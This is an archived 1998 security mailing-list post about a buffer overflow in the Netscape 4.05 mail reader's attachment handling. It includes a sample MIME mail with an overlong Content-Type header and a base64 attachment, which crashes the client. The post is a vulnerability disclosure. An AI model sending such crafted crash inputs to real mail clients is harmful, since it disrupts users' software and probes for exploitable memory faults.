TUCoPS :: Browsers :: netsca~2.txt

The Netscape 4.05 mail reader contains a buffer overflow when dealing with attachments. 


[ http://www.rootshell.com/ ]

Date:         Tue, 28 Jul 1998 20:21:41 +0200
From:         Paul Boehm <paul@BOEHM.ORG>
Subject:      netscape mail overflow(another one)

Hi,
netscape mail crashes when trying to the attachment
from the following pseudo mime mail:

From: Paul Boehm <paul@boehm.org>
To: paul@boehm.org
Subject: test
Mime-Version: 1.0
Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
--ABC123
Content-Type: text/plain; charset=us-ascii

test123

--ABC123
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AA"

H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
AADwvx2CTC7aACgAAA==

--ABC--

i suppose this is exploitable, but i don't really know.
i only tested this with win95 netscape 4.05.

bye,
    paul

--

[ Paul S. Boehm | paul@boehm.priv.at | http://paul.boehm.org/ | infected@irc ]

Money is what gives a programmer his resources. It's an exchange system created
by human beings. It surrounds us. Works for us, binds the economy together.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH